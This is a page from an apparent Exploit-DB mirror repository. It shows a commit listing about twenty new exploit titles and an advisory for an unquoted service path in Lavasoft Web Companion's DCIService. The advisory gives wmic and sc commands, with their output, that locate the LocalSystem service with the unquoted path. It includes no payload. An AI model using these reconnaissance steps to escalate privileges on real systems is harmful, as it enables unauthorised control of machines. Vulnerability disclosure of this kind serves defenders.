bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51143.txt
Exploit-DB 42ade901fe DB: 2023-03-31 
22 changes to exploits/shellcodes/ghdb

LISTSERV 17 - Insecure Direct Object Reference (IDOR)
LISTSERV 17 - Reflected Cross Site Scripting (XSS)

Router ZTE-H108NS - Stack Buffer Overflow (DoS)

Router ZTE-H108NS - Authentication Bypass

Boa Web Server v0.94.14 - Authentication Bypass

Covenant v0.5 - Remote Code Execution (RCE)

Dreamer CMS v4.0.0 - SQL Injection

Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)

Virtual Reception v1.0 - Web Server Directory Traversal

4images 1.9 - Remote Command Execution (RCE)

ClicShopping v3.402 - Cross-Site Scripting (XSS)

Concrete5 CME v9.1.3 - Xpath injection

Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)

Ecommerse v1.0 - Cross-Site Scripting (XSS)

Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)

myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)

WPForms 1.7.8 - Cross-Site Scripting (XSS)

CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token

Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path

Zillya Total Security 3.0.2367.0  - Local Privilege Escalation
2023-03-31 00:16:26 +00:00

31 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path
# Author: P4p4 M4n3
# Discovery Date: 25-11-2022
# Vendor Homepage: https://webcompanion.com/en/
# Version 4.1.0.409
# Tested on: Microsoft Windows Server 2019 Datacenter x64
# Description:
# Lavasoft 4.1.0.409 install DCIservice as a service with an unquoted service path
# POC https://youtu.be/yb8AavCMbes
#Discover the Unquoted Service path
C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
DCIService C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe Auto
C:\Users\p4p4> sc qc DCIService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: DCIService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DCIService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Reference in a new issue View git blame Copy permalink